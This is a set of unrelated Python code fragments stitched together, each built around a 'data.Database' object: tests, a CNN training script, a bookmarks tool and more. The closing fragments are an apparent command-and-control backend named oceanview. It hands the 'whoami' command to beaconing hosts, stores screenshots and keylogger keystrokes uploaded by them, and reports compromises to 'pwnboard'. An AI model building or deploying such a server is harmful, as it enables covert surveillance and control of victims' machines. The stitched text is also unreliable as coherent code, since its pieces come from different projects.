def test_run_sqlite_test(self): import sqlite3 db = data.Database( sqlite3.connect, database="testdb", debug=True ) test(db) ref_database = data.Database( sqlite3.connect, database="testdb" ) print(ref_database.tables) colast_names = ['order_num', 'date', 'trans', 'symbol', 'qty', 'price', 'after_hours'] for col in colast_names: assert col in ref_database.tables['stocks'].columns, f"missing column {col}"
def register_user(db, name, ident): """ Adds a new `data.Person` object to `db`. """ if db is not None: logger.info('Registering user') db.add_person(data.Person(name, ident)) else: logger.info('Registering user and creating db.pkl') db = data.Database().add_person(data.Person(name, ident)) logger.info('Saving DB') l.dump(db)
def __init__(self, filename, gui): self._database = dt.Database(filename) self._gui = gui self.trees = ('_morp', '_dict', '_temp', '_symb', '_rule', '_tabl') # create model for each model in Database for model in self.trees: setattr(self, model, md.Model(self._database, model)) # create model for table names self.table_rules = [] self.tables = md.Model(self._database, '_alltables') self._stack = QtWidgets.QUndoStack()
def new_meeting(): db = data.Database() accessToken = db.read('accessToken') checkAccessToken = api.PingAPI(accessToken) if (checkAccessToken != 'true'): refreshToken = db.read('refreshToken') tokens = api.GetNewTokenWithRefreshToken(clientId, clientSecret, refreshToken) db.write('accessToken', tokens["access_token"]) db.write('refreshToken', tokens['refresh_token']) accessToken = tokens["access_token"] meeting = api.CreateNewMeetingApi(accessToken) print meeting
def test_run_mysql_test(self): import mysql.connector os.environ['DB_USER'] = '******' os.environ['DB_PASSWORD'] = '******' os.environ['DB_HOST'] = 'localhost' if not 'DB_HOST' in os.environ else os.environ['DB_HOST'] os.environ['DB_PORT'] = '3306' os.environ['DB_NAME'] = 'joshdb' os.environ['DB_TYPE'] = 'mysql' env = ['DB_USER','DB_PASSWORD','DB_HOST', 'DB_PORT', 'DB_NAME', 'DB_TYPE'] conf = ['user','password','host','port', 'database', 'type'] config = {cnfVal: os.getenv(dbVal).rstrip() for dbVal,cnfVal in zip(env,conf)} config['debug'] = True db = data.Database( mysql.connector.connect, **config ) test(db)
def main(): """ main function for the program :return: None """ # Has oceanview done something? If this is still false by the end, # Display the Usage information. did_something = False # The user wants to clear the database. if 'cleardb' in sys.argv: did_something = True print("It's sqlite, just delete the file.") # The user wants the test data added to the database. if 'maketestdb' in sys.argv: did_something = True database = data.Database("db.sqlite", "database/build_db.sql") dbutil.add_test_data(database) # The user wants the front end launched if 'front' in sys.argv or 'both' in sys.argv: did_something = True frontend = front.init() frontend.run(INTERFACE, 8000) # The user wants the back end launched. if 'back' in sys.argv or 'both' in sys.argv: did_something = True backend = back.init() backend.run(INTERFACE, 80) # did_something is False, nothing was done, show the usage info. if did_something is False: print("Usage: python oceanview.py [command]") print("COMMANDS:") print(" front - start the frontend") print(" back - start the backend") print(" both - start both") print(" maketestdb - add test data to the database")
def __init__(self): self.logger = logging.getLogger('bookmarks') self.data = data.Database() self.hotlinks = hotlinks.Hotlinks() action = sys.argv[1] if action == 'add': self.process_add() elif action == 'load': self.process_load() elif action == 'list-names': self.process_list_names() elif action == 'list-links': self.process_list_full() elif action == 'show': self.process_show() elif action == 'delete': self.process_delete() elif action == 'hl': self.process_hotlink() else: self.logger.warning(f"Invalid action passed by user: {action}")
except: print_exc() print 'SPARSE OBJECTS', so def register(name, cls): global manager, registered manager.register(name, cls) registered[name] = cls # Serverless, shareless compatibility (for unittesting): def dummy(): global manager manager = DummyManager() return manager # Serverless definitions cache = ProcessCache() manager = DummyManager() register('SharedFile', indexer.SharedFile) register('Database', data.Database) database = data.Database(dbpath) main_confdir = params.confdir print('SHARE IMPORTED')
def development_main(args): import cv2 import cv2_show import numpy as np database = data.Database(distortions=False) def train_input_fn(repeats): return lambda: database.get_train_dataset().shuffle(10000).batch( args.batch_size).repeat(repeats).prefetch(10) def eval_input_fn(): return lambda: database.get_test_dataset().batch(args.batch_size ).prefetch(10) def predict_input_fn(files): return lambda: database.from_files(files).batch(args.batch_size) model = cnn_model.Autoencoder() estimator = model.get_estimator() if args.walk is not None: time_per_step = 3 n_per_step = 90 if len(args.walk) > 1: images = [database.load_image(filename) for filename in args.walk] else: n_images = 10 allowed_types = ['font'] # allowed_types = ['hand', 'font'] train_test_types = ['train', 'test'] labels = [ database.LABELS[i] for i in np.random.choice(len(database.LABELS), n_images) ] types = [ allowed_types[i] for i in np.random.choice(len(allowed_types), n_images) ] train_test = [ train_test_types[i] for i in np.random.choice(len(train_test_types), n_images) ] logger.info('Picking %d random files as intermediate images...' % n_images) images = [] for i in range(n_images): char74k_loader, = database.loaders basedir = os.path.join(char74k_loader.chars74k_dir, types[i], train_test[i], labels[i]) files = os.listdir(basedir) filename = files[np.random.choice(len(files))] image_path = os.path.join(basedir, filename) images.append(database.load_image(image_path)) logger.info(' %s' % image_path) images_tensor_generator = model.walk_latent_space(images, n_per_step) logger.info('Walking through latent space...') if False: # show real-time for images_batch in images_tensor_generator: for image in images_batch: if not cv2_show.show_image( image, wait=int(time_per_step / n_per_step * 1e3)): return logger.info('...done') cv2_show.show_image(image, wait=True) else: # show after gathering all frames images = [] for images_batch in images_tensor_generator: for image in images_batch: images.append(image) cv2_show.show_image(images[0], wait=True) for image in images: if not cv2_show.show_image( image, wait=int(time_per_step / n_per_step * 1e3)): return logger.info('...done') cv2_show.show_image(image, wait=True) return if args.predict: predictions = estimator.predict(predict_input_fn(args.predict)) common_path = os.path.split(os.path.commonprefix(args.predict))[0] filenames = [ os.path.relpath(path, start=common_path) for path in args.predict ] max_filename_len = max(len(name) for name in filenames) logger.info('Predictions:') for filename, prediction_dict in zip(filenames, predictions): image = prediction_dict['reconstructed'] original_image = cv2.imread(os.path.join( common_path, filename)).astype(np.float32) logger.info('{name:>{nlen}}'.format(name=filename, nlen=max_filename_len)) logger.info(' original: %7.2f +- %7.2f, max=%7.2f, min=%7.2f' \ % (original_image.mean(), original_image.std(), original_image.max(), original_image.min())) logger.info(' decoded: %7.2f +- %7.2f, max=%7.2f, min=%7.2f' \ % (image.mean(), image.std(), image.max(), image.min())) if not cv2_show.show_image(original_image): break if not cv2_show.show_image(image): break return info_epochs = lambda _from, _to: logger.info('EPOCHS from {} to {}:'. format(_from, _to)) info_time = lambda time, n_epochs: logger.info( 'Time per epoch: {:.2f} sec = {:.2f} min'.format( time / n_epochs, time / n_epochs / 60)) info_epochs(1, args.epochs) start = time.time() estimator.train(train_input_fn(args.epochs)) info_time(time.time() - start, args.epochs) start = time.time() results = estimator.evaluate(eval_input_fn()) print(results) logger.info('Eval in %.2f sec' % (time.time() - start))
def main(): args = parser.parse_args() # configure verbosity default = tf.logging.WARN verbosity = max(tf.logging.DEBUG, default - args.verbose * tf.logging.DEBUG) tf.logging.set_verbosity(verbosity) log.setLevel(verbosity) database = data.Database() model = cnn_model.Model() estimator = model.get_estimator() if args.gui: logger.info('Using CPU only for better performance in GUI mode') os.environ['CUDA_VISIBLE_DEVICES'] = '' gui.runApp(estimator) def train_input_fn(repeats): return lambda: database.get_train_dataset().shuffle(10000).batch( args.batch_size).repeat(repeats).prefetch(3) def eval_input_fn(): return lambda: database.get_test_dataset().batch(args.batch_size ).prefetch(3) def predict_input_fn(files): return lambda: database.from_files(files).batch(args.batch_size) if args.development_main: development_main(args) return if args.train: info_epochs = lambda _from, _to: logger.info('EPOCHS from {} to {}:'. format(_from, _to)) info_time = lambda time, n_epochs: logger.info( 'Time per epoch: {:.2f} sec = {:.2f} min'.format( time / n_epochs, time / n_epochs / 60)) if args.eval_each_n: n_full = args.epochs // args.eval_each_n if args.eval_each_n is not None else 0 for i in range(n_full): info_epochs(i * args.eval_each_n + 1, (i + 1) * args.eval_each_n) start = time.time() estimator.train(train_input_fn(args.eval_each_n)) info_time(time.time() - start, args.eval_each_n) results = estimator.evaluate(eval_input_fn()) logger.info('Test data accuracy: %.3f' % results['accuracy']) remaining_epochs = args.epochs - n_full * args.eval_each_n if remaining_epochs > 0: info_epochs(n_full * args.eval_each_n + 1, args.epochs) start = time.time() estimator.train(train_input_fn(remaining_epochs)) info_time(time.time() - start, remaining_epochs) else: info_epochs(1, args.epochs) start = time.time() estimator.train(train_input_fn(args.epochs)) info_time(time.time() - start, args.epochs) if args.eval: start = time.time() results = estimator.evaluate(eval_input_fn()) logger.info('Test data accuracy: %.3f (eval in %.2f sec)' % (results['accuracy'], time.time() - start)) if args.predict: predictions = estimator.predict(predict_input_fn(args.predict)) common_path = os.path.split(os.path.commonprefix(args.predict))[0] filenames = [ os.path.relpath(path, start=common_path) for path in args.predict ] max_filename_len = max(len(name) for name in filenames) logger.info('Predictions:') for filename, prediction_dict in zip(filenames, predictions): pi = prediction_dict['predictions'] label = database.CLASSES[pi] probability = prediction_dict['probabilities'][pi] logger.info('{name:>{nlen}}: {lab} ({prob:6.2f} %)'.format( name=filename, nlen=max_filename_len, lab=label, prob=probability * 100)) if args.show: model.visualize_activations(predict_input_fn(args.show))
def init(): """ run the frontend app """ database = databaseobj.Database("db.sqlite", "database/build_db.sql") app = Flask(__name__) @app.route('/') def index(): """Display returning hosts""" return render_template('index.html') # Warning on except; no exception types specified. Noted. Thanks pep8. # pylint: disable=W0702 @app.route('/overview/<string:addr>') def machine(addr='192.168.420.69'): """Show info about a specific machine""" # Grab screencapture filepath from database try: screen_path = database.get_files(addr)[-1][1] except: screen_path = "" # Validate the IP. if validate_ip(addr): return render_template('overview.html', addr=addr, screen_path=screen_path) return "Invalid IP. You're BAD and you should feel BAD." @app.route('/data', methods=['POST']) def data(): """ Handle a JSON request sent by the client. Should include a type and optionally some data. """ # Make sure it's JSON if not request.is_json: print("data request was not JSON.") abort(400) json = request.get_json() # Make sure the type is specified. if not 'type' in json: print("data request did not include a type") abort(400) # Handle a Text Update request if json['type'] == 'text': # Make sure we have a since and addr field if not 'since' in json: print("data request did not include a since") abort(400) if not 'addr' in json: print("data request did not include an ip address.") abort(400) return jsonify(get_text(json['since'], json['addr'], database)) # Handle an IP and TAG request. if json['type'] == 'ip': return jsonify(get_ips(database)) if json['type'] == 'addtag': if not 'addr' in json: print("addtag request did not include an address") abort(400) if not 'tag' in json: print("addtag request did not include a tag.") abort(400) database.add_tag(addr=json['addr'], tag=json['tag']) return ('', 204) # http status code no content if json['type'] == 'rmtag': if not 'addr' in json: print("rmtag request did not include an address") abort(400) if not 'tag' in json: print("rmtag request did not include a tag.") abort(400) database.remove_tag(addr=json['addr'], tag=json['tag']) return ('', 204) # http status code no content # The request did not match any types that we handle. print("The following request is incorrect:") print(json) abort(400) return None # God F*****g Damn You PEP8 @app.route('/brewcoffee') def make_coffee(): """Return code 418, as this is a teapot.""" return "<h1>418</h1>", 418 @app.after_request def add_header(r): # pylint: disable=c0103 """ Add headers to both force latest IE rendering engine or Chrome Frame, and also to cache the rendered page for 10 minutes. """ r.headers["Cache-Control"] = "no-cache, no-store, must-revalidate" r.headers["Pragma"] = "no-cache" r.headers["Expires"] = "0" r.headers['Cache-Control'] = 'public, max-age=0' return r return app
l = core.Loader() def register_user(db, name, ident): """ Adds a new `data.Person` object to `db`. """ if db is not None: logger.info('Registering user') db.add_person(data.Person(name, ident)) else: logger.info('Registering user and creating db.pkl') db = data.Database().add_person(data.Person(name, ident)) logger.info('Saving DB') l.dump(db) if __name__ == '__main__': parser = argparse.ArgumentParser(""" This script registers new users to the database object. See docs/developers/Database.md for object details. """) parser.add_argument('name', help='The name of the maker') parser.add_argument('ident', help='The maker\'s network identifier') parsed = parser.parse_args() if os.access(core.DB_PATH, os.F_OK): register_user(l.load(), parsed.name, parsed.ident) else: register_user(data.Database(), parsed.name, parsed.ident)
def init(): """ Initialize backend app """ database = databaseobj.Database("db.sqlite", "database/build_db.sql") app = Flask(__name__) app.config['UPLOAD_FOLDER'] = 'static/' app.config['ALLOWED_EXTENSIONS'] = {'png', 'jpg'} # This is defined here so that app exists and the things that need this # can have this. def allowed_file(filename): """ checks if file is allowed """ return '.' in filename and \ filename.rsplit('.', 1)[1].lower() in app.config['ALLOWED_EXTENSIONS'] @app.route("/conn") @app.route("/conn/") def beacon_handler(): """ manage beaconing connections :return: command to run on reporter """ return "whoami" @app.route("/screen/<host>", methods=['POST']) @app.route("/screen/<host>/", methods=['POST']) def screenshot_handler(host): """ Handler for screenshot uploads :param host: ip of reporter :return: "invalid" if failed, "success" if successful """ # call to pwnboard try: pwnboard.sendUpdate(host.split("-")[-1]) except: print("Failed pwnboard call") # set upload folder to hostname app.config['UPLOAD_FOLDER'] = "static/" + host try: os.stat(app.config['UPLOAD_FOLDER']) except: os.mkdir(app.config['UPLOAD_FOLDER']) # attempt to save file to disk try: file = request.files['file'] # don't know why this breaks if allowed_file(file.filename): #if True: filename = secure_filename(file.filename) file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) # update database and return success database.add_file(host, app.config['UPLOAD_FOLDER'] + "/" + filename) return "success" except: return "failed" return None # I h8 pep8 @app.route("/key/<host>/", methods=['POST']) def keylog_handler(host): """ Handler for keylogger data, line by line :param host: ip of reporter :return: "invalid" if failed, "success" if successful """ # call to pwnboard try: pwnboard.sendUpdate(host.split("-")[-1]) except: print("Failed pwnboard call") try: pwnboard.sendUpdate(host.split("-")[-1]) data = request.data database.add_keystroke(host, data) return "success" except: return "failed" return app